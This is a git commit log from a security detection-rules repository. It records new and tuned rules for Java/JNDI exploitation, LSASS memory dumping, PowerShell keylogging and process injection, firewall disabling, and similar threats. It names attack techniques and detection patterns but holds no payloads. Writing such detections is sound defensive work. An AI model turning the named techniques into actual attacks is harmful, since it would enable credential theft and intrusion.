1977411e42
Lock versions for releases: 7.13,7.14,7.15,7.16 ( #1659 )
...
* Locked versions for releases: 7.13,7.14,7.15,7.16
(cherry picked from commit a33de6bfb8
2021-12-11 04:07:13 +00:00
69231ff734
[New Rule] Potential JAVA/JNDI Exploitation Attempt ( #1658 )
...
* [New Rule] Potential JAVA/JNDI Exploitation Attempt
Identifies an outbound network connection by JAVA to LDAP, RMI or DNS standard ports followed by a suspicious JAVA child processes. This may indicate an attempt to exploit a JAVA/DNI injection vulnerability.
* rule ID
* expanded JAVA/DNI to Java Naming and Directory Interface
* added ruby and php to list of suspchildprocs
* Update execution_suspicious_java_netcon_childproc.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit 7978b3cc9e
2021-12-11 01:07:31 +00:00
d0334c92bc
[Rule Tuning] Suspicious JAR Child Process ( #1657 )
...
* [Rule Tuning] Suspicious JAR Child Process
Expand rule coverage by removing the process.args containing a jar file requirement which may help detect also exploitation attempt via command injection vulnerabilities on server apps running JAVA.
* Update rules/cross-platform/execution_suspicious_jar_child_process.toml
(cherry picked from commit 410d4e5929
2021-12-11 01:05:31 +00:00
a21031dd6f
[New Rule] PowerShell Reflection Assembly Load ( #1559 )
...
* Create defense_evasion_posh_assembly_load.toml
* Update defense_evasion_posh_assembly_load.toml
* Update rules/windows/defense_evasion_posh_assembly_load.toml
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com >
* Change event.code to event.category
* Update rules/windows/defense_evasion_posh_assembly_load.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit d4e06beee6
2021-12-08 21:00:20 +00:00
60408f423d
[Rule Tuning] Powershell Defender Exclusion ( #1644 )
...
* Split process.args condition
* Update rules/windows/defense_evasion_defender_exclusion_via_powershell.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit ee548328d5
2021-12-08 14:52:31 +00:00
39adbea737
[New Rule] Enumeration of Privileged Local Groups Membership ( #1557 )
...
* [New Rule] Enumeration of Privileged Local Groups Membership
* Update non-ecs-schema.json
* Update discovery_privileged_localgroup_membership.toml
* removed endpoint index (not needed)
* Update rules/windows/discovery_privileged_localgroup_membership.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit b85818f49c
2021-12-08 10:24:38 +00:00
3a396b84c0
[New Rule] Privilege Escalation via Rogue Named Pipe Impersonation ( #1544 )
...
* [New Rule] Privilege Escalation via Rogue Named Pipe Impersonation
* Update rules/windows/privilege_escalation_via_rogue_named_pipe.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update privilege_escalation_via_rogue_named_pipe.toml
* Update rules/windows/privilege_escalation_via_rogue_named_pipe.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit 434e2d0426
2021-12-08 10:22:07 +00:00
e18c26d9be
[New Rule] Potential LSASS Clone Creation via PssCaptureSnapShot ( #1632 )
...
* [New Rule] Potential LSASS Clone Creation via PssCaptureSnapShot
Detects the creation of LSASS clone via event 4688 (Sysmon process creation as well as Elastic endpoint don't capture clone creation due to the way 4688 logs process creation event even before an initial threat starts).
* adding extra ref url
(cherry picked from commit e3b76b7cf7
2021-12-08 10:17:12 +00:00
f393cc35a0
[Rule Tuning] Replaces event.code with event.category on PowerShell ScriptBlock Rules ( #1620 )
...
* Replaces event.code with event.category
* bump updated_date
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit 851c566730
2021-12-08 06:33:39 +00:00
5589c47eab
[Rule Tuning] updates from documentation review for 7.16 ( #1645 )
...
(cherry picked from commit 14c46f50b9
2021-12-08 00:44:11 +00:00
9cae4c2c8b
Updates Host Risk Score documentation ( #1643 )
...
* update host-risk-score.md
* Update docs/experimental-machine-learning/host-risk-score.md
Co-authored-by: Janeen Mikell-Straughn <57149392+jmikell821@users.noreply.github.com >
Co-authored-by: Ryland Herrick <ryalnd@gmail.com >
Co-authored-by: Ece Ozalp <ece.ozalp@elastic.co >
(cherry picked from commit 0935a853fb
2021-12-08 00:06:45 +00:00
6bc87199f0
[Rule Tuning] Switch "Roshal Archive (RAR) or PowerShell File Downloaded from the Internet" to use KQL ( #1651 )
...
* Update command_and_control_download_rar_powershell_from_internet.toml
* bump updated_date
(cherry picked from commit 7b0383ffe2
2021-12-07 12:10:07 +00:00
6a91e9f91b
Limit index to logs-endpoint.events ( #1647 )
...
(cherry picked from commit f6a2437cf8
2021-12-06 16:46:17 +00:00
3d1bea4b65
Adding Beaconing docs ( #1621 )
...
* Adding beaconing docs
* Adding a call out about import options
* Adding a note about the AD job
* Adding more clarity on the release bundle
* Update beaconing.md
* Update docs/experimental-machine-learning/beaconing.md
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
(cherry picked from commit 237dcd2e19
2021-12-01 16:45:44 +00:00
89b75b9792
[New Rule] Suspicious Process Creation CallTrace ( #1588 )
...
* [New Rule] Suspicious Process Creation CallTrace
* Update non-ecs-schema.json
* added min stack vers
* min_stack_vers not needed
* Update rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
* Update rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit d43e3d8e4e
2021-11-30 20:36:43 +00:00
9fefe5bfe6
Updating host risk score and experimental detections docs ( #1639 )
...
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
(cherry picked from commit d061bf8e7c
2021-11-30 19:25:38 +00:00
33030f09fa
[Rule Tuning] Support ECS 1.11 field for IM rule ( #1560 )
...
* Support ecs field for IM rule
* update time interval
* Change additional lookback to 5 minutes
* Add old rule
* Add newline
* Update rules/cross-platform/threat_intel_module_match.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
* Remove im legacy rule
* Udpdate name and description
* Remove min_stack_comment
* Keep 2 IM rule
* add min_stack_comments to rule
* Update rules/cross-platform/threat_intel_indicator_match.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
* adds new rules
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Ece Özalp <ozale272@newschool.edu >
Co-authored-by: Ece Ozalp <ece.ozalp@elastic.co >
(cherry picked from commit c619844b0d
2021-11-30 18:26:44 +00:00
67f77a3fcb
[New Rule] Azure Kubernetes Rolebindings Created ( #1576 )
...
* Create azure_kubernetes_rolebinding_created_or_deleted.toml
* Update
* Update privilege_escalation_azure_kubernetes_rolebinding_created_or_deleted.toml
* Update and rename privilege_escalation_azure_kubernetes_rolebinding_created_or_deleted.toml to privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml
* Update rules/integrations/azure/privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml
* Update and rename privilege_escalation_azure_kubernetes_rolebinding_modified_or_deleted.toml to privilege_escalation_azure_kubernetes_rolebinding_modified.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_modified.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_modified.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_modified.toml
* Update and rename privilege_escalation_azure_kubernetes_rolebinding_modified.toml to privilege_escalation_azure_kubernetes_rolebinding_created.toml
* Update privilege_escalation_azure_kubernetes_rolebinding_created.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
(cherry picked from commit 521f0987ae
2021-11-29 12:17:03 +00:00
526c4e2678
[New Rule] Clearing Windows Console History ( #1623 )
...
* Create defense_evasion_clearing_windows_console_history.toml
* Update defense_evasion_clearing_windows_console_history.toml
* Update defense_evasion_clearing_windows_console_history.toml
* Update rules/windows/defense_evasion_clearing_windows_console_history.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update rules/windows/defense_evasion_clearing_windows_console_history.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update defense_evasion_clearing_windows_console_history.toml
* Update defense_evasion_clearing_windows_console_history.toml
* Update defense_evasion_clearing_windows_console_history.toml
* Update defense_evasion_clearing_windows_console_history.toml
* Update rules/windows/defense_evasion_clearing_windows_console_history.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* bump severity
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
(cherry picked from commit 13fc69b70a
2021-11-25 16:26:25 +00:00
89c49a34b5
[New Rule] Windows Firewall Disabled ( #1565 )
...
* Create defense_evasion_windows_firewall_profile_disabled.toml
* Update defense_evasion_windows_firewall_profile_disabled.toml
* Update defense_evasion_windows_firewall_profile_disabled.toml
* Update defense_evasion_windows_firewall_profile_disabled.toml
* Update defense_evasion_windows_firewall_profile_disabled.toml
* Rename defense_evasion_windows_firewall_profile_disabled.toml to defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Update defense_evasion_windows_firewall_disabled.toml
* Rename defense_evasion_windows_firewall_disabled.toml to defense_evasion_windows_firewall_profile_disabled.toml
* Update rules/windows/defense_evasion_windows_firewall_profile_disabled.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update rules/windows/defense_evasion_windows_firewall_profile_disabled.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Rename defense_evasion_windows_firewall_profile_disabled.toml to defense_evasion_powershell_windows_firewall_disabled.toml
* Update defense_evasion_powershell_windows_firewall_disabled.toml
* Update defense_evasion_powershell_windows_firewall_disabled.toml
* Update defense_evasion_powershell_windows_firewall_disabled.toml
* Update rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update defense_evasion_powershell_windows_firewall_disabled.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
(cherry picked from commit 2ac19440c2
2021-11-24 21:35:08 +00:00
ac69faedbf
[Rule Tuning] Component Object Model Hijacking ( #1491 )
...
* Update persistence_suspicious_com_hijack_registry.toml
Add HKEY_USERS\*Classes\CLSID\*\LocalServer32\ to exclusions.
* Update updated_date
* Update rules/windows/persistence_suspicious_com_hijack_registry.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update rules/windows/persistence_suspicious_com_hijack_registry.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com >
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
(cherry picked from commit dd3e924e4a
2021-11-24 11:58:44 +00:00
e3adb3e089
[New Rule] Potential Credential Access via Renamed COM+ Services DLL ( #1569 )
...
* [New Rule] Potential Credential Access via Renamed COM+ Services DLL
* update dates
* adding config note
* relinted
* Update rules/windows/credential_access_suspicious_comsvcs_imageload.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
* Update rules/windows/credential_access_suspicious_comsvcs_imageload.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
* Update rules/windows/credential_access_suspicious_comsvcs_imageload.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
* update minstack version
* minstack not needed, rule should work on previous versions
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit d1636258e4
2021-11-18 09:28:55 +00:00
24ef481853
[New Rule] Account Password Reset Remotely ( #1571 )
...
* [New Rule] Account Password Reset Remotely
* Update non-ecs-schema.json
* udpate ruleId
* Update rules/windows/persistence_remote_password_reset.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update rules/windows/persistence_remote_password_reset.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update rules/windows/persistence_remote_password_reset.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update rules/windows/persistence_remote_password_reset.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update rules/windows/persistence_remote_password_reset.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit 53a17e6b06
2021-11-18 09:27:02 +00:00
03db89e733
[New Rule] Azure Active Directory High Risk User AtRisk or Confirmed ( #1579 )
...
* Create initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
* Update initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
* Update initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
* Update initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
* Update rules/integrations/azure/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update rules/integrations/azure/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit 3dd32608a0
2021-11-17 22:39:09 +00:00
c434a5dbb5
[New Rule] PowerShell Keylogging Script ( #1561 )
...
* Create collection_posh_keylogger.toml
* Apply suggestions from Samir
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com >
* Fix missing OR
* Change dup guid
* Apply suggestions from Justin
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit 4b6794df32
2021-11-17 22:37:50 +00:00
cb85a35e7a
[Rule Tuning] Suspicious CertUtil Commands ( #1564 )
...
(cherry picked from commit ab521f7c4f
2021-11-17 20:42:11 +00:00
791c8f9864
[New Rule] Potential Process Injection via PowerShell ( #1552 )
...
* Create defense_evasion_posh_process_injection.toml
* Update defense_evasion_posh_process_injection.toml
* Update description
* Apply suggestions from code review
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com >
* Apply suggestions from Justin
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
Co-authored-by: Samirbous <64742097+Samirbous@users.noreply.github.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit 9c54e21820
2021-11-17 10:34:19 +00:00
2f3519d882
[New Rule] Potential LSASS Memory Dump via PssCaptureSnapShot ( #1550 )
...
* [New Rule] Potential LSASS Memory Dump via PssCaptureSnapShot
* Update credential_access_suspicious_lsass_access_via_snapshot.toml
* lint
* Update etc/non-ecs-schema.json
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* moved FP txt to Note.
* Update rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
* Update rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
* Update rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
* Update etc/non-ecs-schema.json
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
* fix json
* Update credential_access_suspicious_lsass_access_via_snapshot.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit e99478db00
2021-11-17 07:46:35 +00:00
7d806b4d3c
[New Rule] Potential Credential Access via LSASS Memory Dump ( #1533 )
...
* [New Rule] Potential Credential Access via LSASS Memory Dump
* Update credential_access_suspicious_lsass_access_memdump.toml
* fix typo in calltrace and event.code type
* Update rules/windows/credential_access_suspicious_lsass_access_memdump.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
* Update credential_access_suspicious_lsass_access_memdump.toml
* added TargetImage to non ecs schema
* Update non-ecs-schema.json
* format
* Update credential_access_suspicious_lsass_access_memdump.toml
* Update credential_access_suspicious_lsass_access_memdump.toml
Co-authored-by: Jonhnathan <jonhnathancesar@gmail.com >
(cherry picked from commit c18c08a976
2021-11-17 07:37:33 +00:00
c1e4bbc2e3
Lock versions for releases: 7.13,7.14,7.15,7.16 ( #1619 )
...
* Locked versions for releases: 7.13,7.14,7.15,7.16
(cherry picked from commit f0f3b83eab
2021-11-16 09:32:29 +00:00
8036eff47e
[bug] Current stack version in deprecation lock missing parens ( #1618 )
...
The function was not being properly called, leading to `null` values
(cherry picked from commit bd9e33e761
2021-11-16 09:19:31 +00:00
eeb087c0fa
Fix kibana-pr command ( #1616 )
...
(cherry picked from commit 76503e8bcd
2021-11-16 08:56:02 +00:00
e2723af3c2
Update registry release from beta to ga
2021-11-15 21:48:46 -09:00
77ffac81e2
[New Rule] PowerShell Suspicious Script with Audio Capture Capabilities ( #1582 )
...
(cherry picked from commit 858d1cf12c
2021-11-16 06:20:37 +00:00
d1a4441c73
Bump min_stack_version in version.lock for specific rules ( #1614 )
...
(cherry picked from commit d78f6354df
2021-11-15 23:39:21 +00:00
ef4fc086ee
Remove 7.15+ rules from 7.14 branch ( #1613 )
...
* Remove 7.15+ rules from 7.14 branch
2021-11-15 14:35:28 -09:00
c42f86eb15
Test to trigger workflows ( #1612 )
...
(cherry picked from commit 59ba8e1540
2021-11-15 19:03:31 +00:00
1edd4303af
Prepare for creation of 7.16 release branch ( #1611 )
...
Removed changes from:
- etc/packages.yml
(selectively cherry picked from commit 95d7e9b6f5
2021-11-15 18:40:36 +00:00
389a7bf292
Move version lock code to object for portability ( #1553 )
...
* Move version lock code to object for portability
* use cached_property to bypass frozen dataclass and set property
* replace load_versions function
(cherry picked from commit 0efae3a52e
2021-11-15 17:47:17 +00:00
cb1a765524
[New Rule] Suspicious Process Access via Direct System Call ( #1536 )
...
* [New Rule] Suspicious Process Access via Direct System Call
* updated query to catch also CallTrace with non ntdll modules
* Update rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml
Co-authored-by: David French <56409778+threat-punter@users.noreply.github.com >
* Update defense_evasion_suspicious_process_access_direct_syscall.toml
Co-authored-by: David French <56409778+threat-punter@users.noreply.github.com >
(cherry picked from commit 81a62f5f68
2021-11-15 09:19:40 +00:00
06340b69b0
Add index as a required field to rule_prompt ( #1595 )
...
(cherry picked from commit 5e6a58ebab
2021-11-15 02:06:42 +00:00
25bfddb291
[Rule Tuning] Rename extrac.exe to extrac32.exe ( #1601 )
...
(cherry picked from commit 017d9a51b7
2021-11-15 02:02:16 +00:00
f656c7bc25
Fix Windows path causing emoji to be rendered in Kibana ( #1585 )
...
In impact_hosts_file_modified rule, the `note` field contains a Windows
path that causes a confused-face-emoji to be rendered in the
Investigation Guide tab.
Surrounding the path in backticks fixes it.
(cherry picked from commit aa219710a1
2021-11-03 16:02:33 +00:00
715188695b
Create host-risk-score.md ( #1599 )
...
update the script name to match shipped artifact
(cherry picked from commit e29a1ca25c
2021-11-03 08:07:01 +00:00
2c197b57fb
Change interval and lookback time for IM rule ( #1596 )
...
(cherry picked from commit f47b0f61cc
2021-11-01 08:28:42 +00:00
365c2a73f2
[Rule Tuning] Hosts File Modified - add process check for linux ( #1593 )
...
* [Rule Tuning] Hosts File Modified - add process check for linux
* add echo and sed to process names in query
(cherry picked from commit ff16832003
2021-10-29 03:57:38 +00:00
ac4e49bcda
Update the marshmallow dependencies in requirements.txt ( #1475 )
...
* Update the marshmallow dependencies in requirements.txt
* Fix typo
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit d03e7972a6
2021-10-29 03:51:48 +00:00
a58666393e
Refresh ECS (1.12.1) and beats (7.15.1) schemas ( #1584 )
...
* Refresh ECS (1.12.1) and beats (7.15.1) schemas
* update ecs to 1.10 for 7.14 stack validation
* add note with reference url
Removed changes from:
- rules/cross-platform/defense_evasion_agent_spoofing_mismatched_id.toml
- rules/cross-platform/defense_evasion_agent_spoofing_multiple_hosts.toml
(selectively cherry picked from commit c8cf88cd62
2021-10-28 16:25:33 +00:00
fa3b089c4c
Add support for eql-wildcard and kql-match_only_text ( #1583 )
...
* Add support for eql-wildcard and kql-match_only_text
* bump kql version
* lookup elasticsearch type family prior to getting type hint
Co-authored-by: David French <56409778+threat-punter@users.noreply.github.com >
(cherry picked from commit d12c04761f
2021-10-28 13:58:44 +00:00
3e717800a8
Updating docs to highlight explainability ( #1542 )
...
* Updating docs to highlight explainability
* Update typosquatting_rule.md
Co-authored-by: Justin Ibarra <brokensound77@users.noreply.github.com >
(cherry picked from commit 0b57778be6
2021-10-26 20:35:18 +00:00
github-actions[bot]